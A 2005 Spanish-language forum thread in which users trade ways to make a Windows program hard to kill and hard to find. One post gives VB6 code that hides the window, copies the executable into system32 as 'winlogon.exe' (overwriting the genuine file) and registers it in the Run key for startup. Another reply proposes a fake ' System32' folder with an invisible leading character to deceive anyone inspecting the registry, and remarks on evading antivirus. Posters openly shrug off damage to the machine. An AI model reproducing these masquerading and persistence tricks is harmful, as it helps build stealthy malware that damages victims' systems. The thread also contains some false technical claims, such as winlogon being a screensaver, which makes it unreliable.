Proceso Protegido

Iniciado por NYlOn, 30 Septiembre 2005, 04:31 AM

0 Miembros y 2 Visitantes están viendo este tema.

la caca

jojojooj y eso combinado con esto:

Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0)                    'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)                                     'las ponemos en minusculas
sys = LCase(sys)
Form1.Visible = False 'ponemos invisible
'-----Copia a \windows--------------
Dim ejec As String
ejec = App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
FileCopy ejec, sys & "\winlogon.exe"  'copia a windows\system32
End If
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "winlogon", win & "\winlogon.exe"  'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False          'para ocultarlo un poco del, (alt +sup +control) (aunque es una bosta jejej no funciona en XP)



bueno espero que les sirva para copiar todo en la carpeta windows jejeje

p.D.: usenlo con el codigo de NYlOn

chau
algo huele mal.... firma "LA CACA"


A2Corp

una pregunta... que en System32 no esta el proceso original de winlogon.exe???????
Esto no afectaria a nuestro copy?
o no dañaria al archivo de winlogon.exe original?

y para editar el registro mejor usa apis!, pke esos scripts seran detectados como virus...
Saludos!
Hackeo, luego existo...

la caca

me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc jjejej

che haber pasate las funciones api para modificar el registro si??
algo huele mal.... firma "LA CACA"


NYlOn

#13
Si, dañaria el archivo original :S
Lo q se puede hacer es crear una carpeta en %WindowsRoot% con el nombre de " System32"
Si se fijan bien hay un espacio adelante de "System32", echo con el ALT + 0160.. De esta forma, si alguien se fija en el Registro, aparecera (x ej) "C:\Windows\ System32\Winlogon.exe", x lo que se asemejaria bastante a la realidad :P

(Ahora, esperemos que no revise su carpeta de Win muy seguido pq se daria cuenta xDDD)

Sino lo podemos guardar en la carpeta de Windows y chau problema :p

salu2 !

ah y tengo entendido que eso del los objetos en Script los detectan los antivirus, pero yo tengo el NAV 2004 y no dice ni Mu xD

EDIT:
Citarme importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc

La idea no era para dañar el sistema, solo para q no se pueda terminar alguna aplicacion...
Y BUSCA un poco sobre las API's, en el foro hay mucho tmb...

yeikos

Windows hace un resguardo de sus archivos más 'importantes', así como taskmsg, regedit y demás, por lo tanto si borramos el archivo winlogon.exe supuestamente al reiniciar windows creará de nuevo este archivo.

PD: Winlogon tan solo es un salvapantallas, no podría originar daños en el ordenador, nada más que cuando apareciera el salvapantallas tras una inactividad se ejecutará este archivo.

A2Corp

Ohhhhhh........  Gracias por decirme eso, no se pke kreia que winlogon.exe era algo relacionado con la entrada de windows xD... Ese que te pone cuando eskoges el usuario para entrar xD.
Hackeo, luego existo...

byebye

winlogon no es un salvapantallas. el tema de "que no se puede cerrar el proceso", eso pasa en todos los sitemas (w2k/xp) pq los servicios "no puedes" cerrarlos. tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.

_Sergi_

Pues vaya con los programadores de Microsoft... ¿Nunca pensaron que cualquiera puede renombrar un archivo?
Proyecto de Ingeniero

NYlOn

Citartu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.

Nunca habia oido esto, podrias decirme como ?? ;D

desde ya muchas gracias ^^

salu2 !

byebye

Citar

(SeDebugPrivilege)
   

Permite al usuario asignar un depurador a cualquier proceso.
   
El privilegio SeDebugPrivilege permite cambiar el flujo de ejecución de cualquier proceso o matarlo (incluyendo los subsistemas de seguridad o cualquier servidor RPC).


solo te queda buscar un poco.